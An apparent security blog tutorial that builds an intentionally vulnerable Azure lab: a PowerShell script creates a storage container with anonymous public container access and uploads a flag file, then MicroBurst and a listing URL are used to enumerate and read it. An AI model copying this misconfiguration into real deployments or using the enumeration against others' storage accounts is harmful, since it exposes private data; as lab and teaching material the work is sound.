Create an Azure Vulnerable Lab: Part #1 – Anonymous Blob Access

This article is part of a blog series where I explain common Azure vulnerabilities, how to create a lab such that it reproduces the issues, and how to exploit it. To follow this tutorial, you’ll need an Azure account and Azure CLI tool installed on your machine both of which you can get for free.

1. Anonymous Blob Access

“Storage Accounts” is the service provided by Azure to store data in the cloud. A storage account can used to store

  • Blobs
  • File shares
  • Tables
  • Queues
  • VM disks

For this tutorial, we will focus on the Blobs section. Blobs are stored within a container, and we can have multiple containers within a storage account. When we create a container, Azure will ask on the permissions that we grant for public access. We can chose between:

  • Private Access – no anonymous access is allowed
  • Blob Access – we can access the blobs anonymously, as long as we know the full URL (container name + blob name)
  • Container Access – we can access the blobs anonymously, as long we know the container name (directory listing is enabled, and we can see all the files stored inside the container)

As you might have guessed, granting Container Access permission can be easily abused to download all the files stored within the container without any permissions as the only things required to be known are the storage account name and the container name, both of which can be enumerated with wordlists.

2. Creating a vulnerable storage account

First, let’s use the az cli to login:

az login

To create a vulnerable storage account, we need to create a “Resource Group”. A resource group is a way to keep together different services such as Production, Development, Testing, etc.

az group create --name $resourceGroupName --location $location

Once we have the resource group, we will need to:

  1. Create a Storage Account inside that Resource Group
  2. Create a Container inside the Storage Account
  3. Make the Container “vulnerable” (a.k.a allow anonymous access of blob + directory listing)
  4. Upload “sensitive” files to publicly accessible blob

To create a storage account, we use the “az storage account create” command. For the moment, what’s important is that the resource group name matches the name of the Resource Group we created earlier:

az storage account create --resource-group $resourceGroupName --name $blobStorageAccName --location $location --sku $storageAccType --access-tier Cool

To create a Container, we use the “az storage container create” utility:

az storage container create --name $containerName --public-access container --account-name $blobStorageAccName

Lastly, create a folder locally on your machine, and a “flag.txt” file inside it. This will be the blob that we will upload to Azure for anonymous public access. To upload the blob, we use the “az storage blob upload” command:

az storage blob upload  --account-name $blobStorageAccName --container-name $containerName --file ".\flags\flag.txt" --name "flag.txt"

Now, to make things easier to deploy/re-deploy/configure/destroy, let’s save all these variables value before running the script and put everything together:

##Variables
$resourceGroupName = "0xpwnlab"
$blobStorageAccName = "0xpwnstorageacc"
$location = "West Europe"
$storageAccType = "Standard_LRS"
$containerName = "public"


function Init {
    az login
    az group delete --name $resourceGroupName --yes
    az group create --name $resourceGroupName --location $location
}

function Create-PublicBlobChallenge  {
    ##Create storage account
    az storage account create --resource-group $resourceGroupName --name $blobStorageAccName --location $location --sku $storageAccType --access-tier Cool

    ##Create container 
    az storage container create --name $containerName --public-access container --account-name $blobStorageAccName

    ##Upload blob flag
    az storage blob upload  --account-name $blobStorageAccName --container-name $containerName --file ".\flags\flag.txt" --name "flag.txt"
}  


Init
Create-PublicBlobChallenge

The init function will ensure we are logged in before starting to deploy. Your directory structure would look like this:

E:\challenge-01\challenge-01.ps1
E:\challenge-01\flags\flag.txt

3. Exploiting Anonymous Blob Access

Now, there are thousands of articles explaining how this can be abused and how to search for insecure storage in Azure, but to make things easier I’ll do a TL:DR. One of the easiest way is to use MicroBurst, provide the storage account name to search for, and it’ll check if the containers exists based on a wordlist saved in the Misc/permutations.txt:

PS > import-module .\MicroBurst.psm1
PS> Invoke-EnumerateAzureBlobs -Base 0xpwnstorageacc
Found Storage Account - 0xpwnstorageacc.blob.core.windows.net
Found Container - 0xpwnstorageacc.blob.core.windows.net/public
Public File Available: https://0xpwnstorageacc.blob.core.windows.net/public/flag.txt

Alternatively add ?restype=container&comp=list after the container name:

https://0xpwnstorageacc.blob.core.windows.net/public?restype=container&comp=list

<EnumerationResults ContainerName="https://0xpwnstorageacc.blob.core.windows.net/public">
<Blobs>
<Blob>
<Name>flag.txt</Name>
<Url>
https://0xpwnstorageacc.blob.core.windows.net/public/flag.txt
</Url>
<Properties>
<Last-Modified>Sat, 05 Mar 2022 18:02:14 GMT</Last-Modified>
<Etag>0x8D9FED247B7848D</Etag>
<Content-Length>34</Content-Length>
<Content-Type>text/plain</Content-Type>
<Content-Encoding/>
<Content-Language/>
<Content-MD5>lur6Yvd173x6Zl1HUGvtag==</Content-MD5>
<Cache-Control/>
<BlobType>BlockBlob</BlobType>
<LeaseStatus>unlocked</LeaseStatus>
</Properties>
</Blob>
</Blobs>
<NextMarker/>
</EnumerationResults>

6 thoughts on “Create an Azure Vulnerable Lab: Part #1 – Anonymous Blob Access

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s